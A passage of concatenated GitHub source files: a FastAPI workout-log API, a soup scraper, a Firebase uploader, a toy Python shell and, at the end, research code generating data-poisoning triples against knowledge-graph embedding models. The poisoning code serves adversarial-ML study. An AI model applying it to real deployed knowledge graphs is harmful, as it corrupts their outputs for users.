{}.\".format(e))\n tf.reset_default_graph()\n","repo_name":"tneuer/Masterarbeit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73475143687","text":"import uuid\nfrom pydantic import BaseModel\nfrom fastapi import Depends\nfrom app.ctx import AppCtx\nfrom app.utils import fastapi as fastapi_utils\nfrom app.utils import auth as auth_utils\nfrom sqlalchemy.sql import expression as sa_exp\nfrom app.models import orm as m\n\nrouter = fastapi_utils.CustomAPIRouter(\n prefix=\"/performance/log\", tags=[\"performance_log\"]\n)\n\n\nclass PerformanceLogGetAndListResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\"GET\", \"/:id\", error_codes=[])\nasync def performance_log_get(\n id: uuid.UUID,\n) -> PerformanceLogGetAndListResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n return PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\"GET\", \"\", error_codes=[])\nasync def performance_log_list() -> list[PerformanceLogGetAndListResponse]:\n performance_log_query = sa_exp.select(m.PerformanceLog)\n\n performance_log_query = performance_log_query.order_by(\n m.PerformanceLog.created.asc()\n )\n\n performance_log_list = (\n (await AppCtx.current.db.session.execute(performance_log_query)).scalars().all()\n )\n\n return [\n PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n for performance_log in performance_log_list\n ]\n\n\nclass PerformanceLogPostRequest(BaseModel):\n count: int\n weight: int\n exercise_category_id: uuid.UUID\n daily_log_id: uuid.UUID\n\n\nclass PerformanceLogPostResponse(BaseModel):\n id: uuid.UUID\n\n\n@router.api_wrapper(\n \"POST\",\n \"\",\n error_codes=[],\n)\nasync def performance_log_post(\n q: PerformanceLogPostRequest,\n) -> PerformanceLogPostResponse:\n exercise_category = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.ExerciseCategory).where(\n m.ExerciseCategory.id == q.exercise_category_id\n )\n )\n ).scalar_one_or_none()\n\n if exercise_category is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n daily_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.DailyLog).where(m.DailyLog.id == q.daily_log_id)\n )\n ).scalar_one_or_none()\n\n if daily_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n performance_log = m.PerformanceLog(\n count=q.count,\n weight=q.weight,\n exercise_category=exercise_category,\n daily_log=daily_log,\n )\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPostResponse(id=performance_log.id)\n\n\nclass PerformanceLogPatchRequest(BaseModel):\n count: int | None\n weight: int | None\n\n\nclass PerformanceLogPatchResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\n \"PATCH\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_patch(\n id: uuid.UUID,\n q: PerformanceLogPatchRequest,\n) -> PerformanceLogPatchResponse:\n 
performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n for key, value in q.__dict__.items():\n if value is not None:\n setattr(performance_log, key, value)\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPatchResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\n \"DELETE\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_delete(\n id: uuid.UUID,\n) -> fastapi_utils.DefaultResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n await AppCtx.current.db.session.delete(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return fastapi_utils.DefaultResponse()\n","repo_name":"Mactto/weight-daily-log-api","sub_path":"app/apis/performance_log.py","file_name":"performance_log.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41092897494","text":"from lxml.html import parse\nfrom pprint import pprint\nimport pickle\nimport re\n\n\"\"\"\nFetch this week's soup from Leon's website\n\nRun: daily, early morning\n\"\"\"\n\noutfile = '/tmp/leon.pkl'\nsoupurl = 'http://leonrestaurants.co.uk/menu/all-day/'\n\ndef fix_text(astr) :\n\tastr = astr.replace(' Soup', '').strip()\n\treturn astr\n\n\ndef is_soup(item):\n\tif (\"Soup\" in item):\n\t\treturn True\n\treturn False\n\n\ndoc = parse(soupurl)\nelements = doc.xpath('//div[@class=\"more-info-wrapper\"]/h1[@class=\"menu-item-title\"]')\n\nroughlist = [elem.text for elem in elements if (is_soup(elem.text))]\nsouplist = map(fix_text, roughlist)\n\n#pprint(souplist)\n\noutput = open(outfile, 'wb')\npickle.dump(souplist, output, -1)\noutput.close()\n","repo_name":"simonharris/whatsoupisittoday.com","sub_path":"_scripts/fetch_leon.py","file_name":"fetch_leon.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"22860830503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ride', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ride',\n name='serviced_by',\n field=models.ForeignKey(related_name='rides', blank=True, to='core.Driver', null=True),\n ),\n ]\n","repo_name":"cmpe-295/project-backend","sub_path":"safe_ride/ride/migrations/0002_auto_20161018_0043.py","file_name":"0002_auto_20161018_0043.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8749001831","text":"# Import for data-typing\nfrom google.auth.transport.requests import AuthorizedSession\nimport google.auth.transport.requests as requests\nfrom http import client\n\n# Built-in libraries\nimport json\nimport threading\nimport time\n\n# Global variables\nerror_files = []\n# 
----------------------------------------------------------------------------------\n\n\nclass RequestThread(\n threading.Thread\n):\n def __init__(\n self,\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n full_url: str,\n file_name: str,\n index_lock: threading.Lock,\n print_lock: threading.Lock,\n error_lock: threading.Lock,\n ) -> None:\n \"\"\"\n Thread to handle POST requests\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n full_db_url (str): URL of database\n file_name (str): Name of file to add to database\n index_lock (threading.Lock): Lock to prevent race conditions while accessing/editing index.json\n print_lock (threading.Lock): Lock to prevent race conditions while printing\n error_lock (threading.Lock): Lock to prevent race conditions while adding to error list\n \"\"\"\n threading.Thread.__init__(self)\n self.session = auth_session\n self.file_dir = file_dir\n self.index_json_dir = index_json_dir\n self.full_url = full_url\n self.file_name = file_name\n self.index_lock = index_lock\n self.print_lock = print_lock\n self.error_lock = error_lock\n self.connection_attempts = 0\n\n def run(\n self\n ) -> None:\n \"\"\"\n Function that overrides threading.Thread's default behavior.\n \"\"\"\n global error_files\n\n # Ensures that the program will attempt a few times to connect to the database\n while self.connection_attempts < 3:\n try:\n # Checks to see if the file has already been added to the index\n with self.index_lock:\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # If the file is already in the index\n if self.file_name in index_json.keys():\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} already exists! 
\")\n\n # If the file is not already in the index\n else:\n # Builds file path\n full_file_dir = f\"{self.file_dir}/{self.file_name}\"\n\n # Opens JSON file (thread safe because threads are accessing different files)\n with open(full_file_dir, \"r\", encoding=\"utf-8\") as f:\n edit_json_file = json.load(f)\n\n # Renames keys since Firebase does not like $'s in keys\n schema = edit_json_file['$schema']\n json_id = edit_json_file['$id']\n\n del edit_json_file['$schema']\n del edit_json_file['$id']\n\n edit_json_file['schema'] = schema\n edit_json_file['id'] = json_id\n\n json_file = json.dumps(edit_json_file, indent=4, sort_keys=True)\n\n # Sends JSON to database\n response = self.session.post(self.full_url, data=json_file)\n\n # If the database says it was a good request\n if response.status_code == 200:\n\n # Puts response into a JSON\n response_detail = response.json()\n\n # Index lock\n with self.index_lock:\n # Pulls up latest version of index\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # We add the added json name to the index file with the unique ID assigned by the db\n index_json[str(self.file_name)] = response_detail[\"name\"]\n\n # Overwrites index JSON (with formatting)\n with open(self.index_json_dir, \"w\") as f:\n json.dump(index_json, f, indent=4, sort_keys=True)\n\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} successfully added!\")\n\n # If the databases says it was not a good request\n else:\n # Error lock\n with self.error_lock:\n error_files.append(\n f\"{self.file_name} Error: {response.status_code}\"\n )\n\n # If there is a connection error\n except client.RemoteDisconnected:\n print(f\"Connection failed with {self.file_name}\")\n self.connection_attempts += 1\n\n if self.connection_attempts >= 3:\n error_files.append(f\"{self.file_name} Error: ConnectionError\")\n break\n\n else:\n time.sleep(3)\n pass\n\n else:\n break\n\n\ndef main(\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n db_folder_url: str,\n file_list: list[str],\n) -> None:\n \"\"\"\n Main function to add JSONs to the database\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n db_folder_url (str): URL of target database folder\n file_list (list[str]): List of file names within target directory\n \"\"\"\n global error_files\n\n # Creates locks\n index_lock = threading.Lock()\n print_lock = threading.Lock()\n error_lock = threading.Lock()\n\n # Creates threads\n threads = []\n for file in file_list:\n threads.append(\n RequestThread(\n auth_session,\n file_dir,\n index_json_dir,\n db_folder_url,\n file,\n index_lock,\n print_lock,\n error_lock,\n )\n )\n\n # Starts threads\n for thread in threads:\n thread.start()\n\n # Joins threads\n for thread in threads:\n thread.join()\n\n # Error notifications\n if len(error_files) > 0:\n print(\"The following files had errors:\\n\")\n\n for file in error_files:\n print(file)\n\n error_files = []\n\n print()\n\n\n# If the program is run directly when it is not supposed to\nif __name__ == \"__main__\":\n print(\n \"This code is not meant to be executed directly, please execute main.py instead.\"\n )\n","repo_name":"SethHartman13/Magic-Item-Database-v.2","sub_path":"magic_item_post.py","file_name":"magic_item_post.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"25043136042","text":"class Region:\n \"\"\"Class to store region info\"\"\"\n\n def __init__(self, y_axis, start, stop):\n\n self.y_axis = y_axis\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return region info as string\"\"\"\n\n line = list(map(str, [self.y_axis, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return region info as list\"\"\"\n\n return [self.y_axis, self.start, self.stop]\n\n\nclass Segment:\n \"\"\"Class to store segment info\"\"\"\n\n def __init__(self, count, start, stop):\n\n self.count = count\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return segment info as string\"\"\"\n \n line = list(map(str, [self.count, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return segment info as string\"\"\"\n\n return [self.count, self.start, self.stop]\n\n\nclass Parser:\n \"\"\"Class to get and parse data from source file\"\"\"\n\n def __init__(self, data_path):\n\n self.data_path = data_path\n # Store regions in a list of Region objects\n self.regions = []\n # Store segments in a list of Segment objects\n self.segments = []\n\n self.get_data()\n self.non_overlapping_segments()\n\n def get_data(self):\n \"\"\"Read source file and create regions and segments datasets\"\"\"\n\n regions_file = open(self.data_path, 'r')\n regions_lines = regions_file.readlines()\n regions_file.close()\n\n for line in regions_lines:\n split_line = line.rstrip().split('\\t')\n start = int(split_line[0])\n stop = int(split_line[1])\n region = Region(0, start, stop)\n self.regions.append(region)\n self.segments = self.segments + [start, stop]\n\n def non_overlapping_segments(self):\n \"\"\"Parse segments dataset as a list of non-overlapping Segment intervals\"\"\"\n\n # Remove duplicated segments to avoid duplicated non-overlapping intervals\n self.segments = list(set(self.segments))\n # Order the segments to set correctly non-overlapping interval\n self.segments.sort()\n # Set non-overlapping intervals as region-region start-stop pairs Segment objects\n # If segment B has start position X, then segment A has end position X-1. 
The segments do not overlap.\n self.segments = [Segment(0, self.segments[i], self.segments[i + 1] - 1) for i in range(len(self.segments)-1)]\n \n\nclass Process:\n \"\"\"Class to process part1 and part2 tasks and export results\"\"\"\n\n def __init__(self, regions, segments):\n\n self.regions = regions\n self.segments = segments\n\n def to_list(self, dataset):\n \"\"\"Return dataset(Region/Segment) as a list of list info\"\"\"\n\n return [data.to_list() for data in dataset]\n\n def export_data(self, dataset, path):\n \"\"\"Export results to output file\"\"\"\n\n output = open(path, 'w')\n for data in dataset:\n output.write(data.to_string())\n output.close()\n\n def overlap(self, region1, region2):\n \"\"\"Check if two region/segment overlaps\"\"\"\n\n # Overlap border cases consideration:\n # If the overlap is based on 1 position been a START ovelap over a STOP, is not considered overlap\n return ((region1.start <= region2.start < region1.stop) or \n (region1.start < region2.stop <= region1.stop) or \n ((region1.start >= region2.start) and (region1.stop <= region2.stop)))\n\n def part1_task(self):\n \"\"\"Part1 task calculation\"\"\"\n\n for region in self.regions:\n # Store the Y-axis level used by other regions on the start-stop coordinates scope\n overlaped_y_axis = []\n for comp_region in self.regions: \n if self.overlap(comp_region, region):\n overlaped_y_axis.append(comp_region.y_axis)\n\n overlaped_y_axis.sort()\n # Select the highest Y-axis level in used and add 1\n updated_y_axis = overlaped_y_axis[-1] + 1\n # Check if there is and empty lower level. If there are more than one select the lowest\n i = 0\n while i < len(overlaped_y_axis)-1:\n if overlaped_y_axis[i+1] > overlaped_y_axis[i] + 1:\n updated_y_axis = overlaped_y_axis[i] + 1\n break\n i+=1\n # Update the region Y-axis level value\n region.y_axis = updated_y_axis\n\n def part2_task(self):\n \"\"\"Part2 task calculation\"\"\"\n\n for segment in self.segments:\n for region in self.regions:\n if self.overlap(segment, region):\n # If a region overlap the segment add 1 to segment count\n segment.count += 1\n # Remove segments with no overlapping regions\n self.segments = [segment for segment in self.segments if segment.count>0]\n","repo_name":"AgustinPardo/Illumina-Challenge","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10002337293","text":"import os\nimport shutil\n\nimport subprocess\n\n\nclass Shell: \n \n \n\n def __init__(self, root_path):\n \n self.root_path = root_path\n self.process = 0\n if os.path.exists('log.txt'):\n \n posR = open('log.txt','r')\n pos = posR.read()\n strings = pos.split('\\n')\n if pos.__len__() > 1:\n \n lastCommand = strings[strings.__len__()-2]\n\n self.callWrite = int(lastCommand[0])\n else:\n self.callWrite = 0\n else:\n self.log = open('log.txt','x')\n self.callWrite = 0\n \n def ls(self):\n #pasta = self.root_path\n #esta mostrado diretorios desnecessarios\n\n return os.listdir('./')\n\n def pwd(self):\n return self.root_path\n\n def cd(self, path):\n \n if path.__len__() == 1:\n os.chdir('/')\n self.root_path = os.getcwd()\n else:\n try:\n os.chdir(path[1])\n self.root_path = os.getcwd()\n \n except:\n print(\"cd: \"+path[1]+\": No such file or directory\")\n\n def cp(self, orig, dest):\n try:\n shutil.copy( orig , dest )\n except:\n print('cp: cannot stat '+orig+': No such file or directory')\n\n def mv(self, orig, dest):\n try:\n if orig == 
'log.txt' or orig == 'help':\n print('no permission to remove this file press help for information')\n else:\n shutil.move( orig , dest ) \n except:\n print('mv: cannot stat '+orig+': No such file or directory') \n \n def rm(self,arq='', file=''):\n if os.path.exists(file):\n if arq == '':\n if os.path.isfile(file):\n if file == 'log.txt' or file == 'help.txt':\n print('no permission to remove file \\npress help for information')\n else:\n os.remove(file)\n\n elif os.path.isdir(file):\n print('rm: cannot remove '+file+': Is a directory')\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n else:\n if arq == '-r':\n shutil.rmtree(file)\n else:\n print('rm: cannot remove '+file+': No such file or directory')\n \n def mkdir(self,pasta):\n if os.path.isdir(pasta):\n print ('mkdir: cannot create directory \"'+pasta+'\": File exists')\n else:\n os.mkdir(pasta)\n\n def uname(self):\n return os.uname() \n \n def rename(self,orig,dest):\n if os.path.exists(orig):\n os.rename(orig,dest)\n else:\n print('No such file or directory')\n\n def cat(self,arq):\n file = open(arq,'r')\n lines = file.read()\n return lines\n\n def testScript(self,script):\n if ( script[script.__len__()-3] == '.'):\n if script[script.__len__()-2] == 'p' and script[script.__len__()-1] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n def exec(self,scrip):\n try:\n exec(open(scrip).read())\n\n except:\n print('error ao execultar o script')\n\n def writeLog(self,string):\n self.callWrite+=1\n self.log= open(\"log.txt\", \"a\")\n s = str(self.callWrite)+\" \"+string+\"\\n\"\n self.log.write(s)\n\n def history(self):\n return self.cat('log.txt')\n\n def grep(self, words, arquivo):\n out = []\n try:\n \n strings = self.readStrings(arquivo)\n for word in strings:\n st = word.split(' ')\n for item in st:\n if words == item:\n out.append(words) \n \n return out\n except:\n return out\n\n\n \n def readStrings(self,arquivo):\n posR = open(arquivo,'r')\n pos = posR.readlines()\n return pos\n\n \n\n\n\nif __name__ == \"__main__\":\n shell = Shell( os.getcwd())\n \n print(\"-- Welcome to Shell \\nPress -help for Commands or q to out--\\n\")\n s = ' '\n while(s != 'exit'):\n s = input(\"\"+shell.pwd()+\"# \") \n\n s1 = s.split(' ')\n if s1.__len__() == 1:\n shell.writeLog(s)\n if s1[0] == \"ls\":\n for item in shell.ls():\n print(item)\n \n elif s1[0] == \"pwd\":\n print(shell.pwd())\n \n elif s1[0] == \"uname\":\n \n print(shell.uname())\n \n elif s1[0] == 'help':\n print('needs help')\n\n elif s1[0] == 'history':\n print(shell.history())\n elif s1[0] == 'exit':\n pass\n else:\n print(s+\": command not found\")\n\n else:\n shell.writeLog(s)\n if s1[0] == 'cd':\n \n if( s1.__len__() == 2):\n shell.cd(s1)\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'cp':\n \n if( s1.__len__() == 3):\n shell.cp(s1[1],s1[2])\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] =='mv':\n \n if( s1.__len__() == 3):\n shell.mv(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'rm':\n \n if s1.__len__() == 2: \n shell.rm(file = s1[1])\n elif( s1.__len__() == 3):\n shell.rm(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'mkdir':\n \n if s1.__len__() == 2:\n shell.mkdir(s1[1])\n else: \n 'mkdir: missing operand\\nTry \"help\" for more information.'\n \n elif s1[0] == 'rename':\n if s1.__len__() == 3:\n shell.rename(s1[1],s1[2])\n else: \n 'rename error: Try \"help\" for more information.'\n\n elif s1[0] == 'cat':\n if s1.__len__() == 2:\n 
print(shell.cat(s1[1]))\n else: \n 'cat error: Try \"help\" for more information.'\n \n elif s1[0] == './':\n if s1.__len__() == 2:\n shell.exec(s1[1])\n \n elif s1[0] == 'grep':\n if s1.__len__() == 3:\n print(shell.grep(s1[1],s1[2]))\n\n else:\n print(s+\": command not found\")\n \n \n \n \n\n","repo_name":"RodrigoPrintes/SO","sub_path":"Shell/Shell.py","file_name":"Shell.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73273700809","text":"# proposed by \"Data Poisoning Attack against Knowledge Graph Embedding\"\n# we use the Direct Attack in the paper\n# we want to find the triple (h', r', t') = argmax(f(h,r',t') - f(h+dh, r', t'))\n# CUDA_VISIBLE_DEVICES=0 python codes/noise_generator/direct_addition.py --init_checkpoint ./models/ComplEx_FB15k-237_baseline/\n\nimport itertools\n\nimport torch\n\nfrom collections import defaultdict\nfrom random_noise import *\nimport torch.autograd as autograd\n\n\nclass DirectAddition(GlobalRandomNoiseAttacker):\n def __init__(self, args):\n super(DirectAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct\"\n\n self.true_rel_head, self.true_rel_tail = defaultdict(set), defaultdict(set)\n for triple in self.input_data.all_true_triples:\n self.add_true_triple(triple)\n \n def add_true_triple(self, triple):\n h, r, t = triple\n self.true_rel_tail[h].add((r, t))\n self.true_rel_head[t].add((r, h))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n s = time.time()\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_h, perturbed_embed_t = None, None\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_h = embed_h - args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_t = embed_t - args.epsilon * embed_t_grad\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_h, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_h, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, embed_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n 
cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\n def get_noise_triples(self):\n noise_triples, args = self.noise_triples, self.args\n args.num_cand = np.math.ceil((args.nentity*args.nrelation)*args.corruption_factor / 100)\n all_true_triples = set(self.input_data.all_true_triples)\n for i in range(len(self.target_triples)):\n sys.stdout.write(\"%d in %d\\r\" % (i, len(self.target_triples)))\n sys.stdout.flush()\n target_triple = self.target_triples[i]\n noise_triple_h, score_h = self.get_noise_for_head(target_triple, mode=\"head-batch\")\n noise_triple_t, score_t = self.get_noise_for_head(target_triple, mode=\"tail-batch\")\n if score_h > score_t:\n noise_triples.add(noise_triple_h)\n self.add_true_triple(noise_triple_h)\n else:\n noise_triples.add(noise_triple_t)\n self.add_true_triple(noise_triple_t)\n return list(noise_triples)\n\nclass CentralDiffAddition(DirectAddition):\n def __init__(self, args):\n super(CentralDiffAddition, self).__init__(args)\n self.name = \"central_diff\"\n self.args.epsilon = self.args.learning_rate\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_e, enforced_embed_e = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_e = embed_h - args.epsilon * embed_h_grad\n enforced_embed_e = embed_h + args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_e = embed_t - args.epsilon * embed_t_grad\n enforced_embed_e = embed_t + args.epsilon * embed_t_grad\n ########## end difference ############\n\n b_begin = 0\n cand_scores = []\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(enforced_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, enforced_embed_e, mode=mode)\n ########## end difference ############\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n 
cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\nclass DirectRelAddition(DirectAddition):\n def __init__(self, args):\n super(DirectRelAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct_rel\"\n self.true_head_tail = {}\n for h, r, t in self.input_data.all_true_triples:\n if r not in self.true_head_tail:\n self.true_head_tail[r] = set()\n self.true_head_tail[r].add((h, t))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n if mode == \"tail-batch\":\n return test_triple, -1e9\n args = self.args\n h, r, t = test_triple\n s = time.time()\n true_cand = self.true_head_tail[r]\n cand_h_list = random.choices(self.all_entities, k=args.num_cand)\n cand_t_list = random.choices(self.all_entities, k=args.num_cand)\n cand_h_t_list = list(set(zip(cand_h_list, cand_t_list)).difference(true_cand))\n cand_h_list, cand_t_list = zip(*cand_h_t_list)\n cand_h_list, cand_t_list = list(cand_h_list), list(cand_t_list)\n args.num_cand = len(cand_h_list)\n e1 = time.time()\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n embed_r_grad = autograd.grad(score, embed_r)[0]\n perturbed_embed_r = embed_r - args.epsilon * embed_r_grad\n e2 = time.time()\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_h = cand_h_list[b_begin: b_begin + args.num_cand]\n b_cand_t = cand_t_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_h = self.kge_model.entity_embedding[b_cand_h]\n embed_cand_t = self.kge_model.entity_embedding[b_cand_t]\n s1 = self.kge_model.score_embedding(embed_cand_h, perturbed_embed_r, embed_cand_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_h, embed_r, embed_cand_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n e3 = time.time()\n self.true_head_tail[r].add((cand_h_list[idx], cand_t_list[idx]))\n return (cand_h_list[idx], r, cand_t_list[idx]), score.item()\n\nif __name__ == \"__main__\":\n args = get_noise_args()\n override_config(args)\n \n suffix = \"\"\n if args.corruption_factor != 5:\n suffix = \"_%d\" % args.corruption_factor\n generator = DirectAddition(args)\n generator.generate(\"direct\" + suffix)\n \n generator = CentralDiffAddition(args)\n generator.generate(\"central_diff\" + suffix)\n \n generator = DirectRelAddition(args)\n 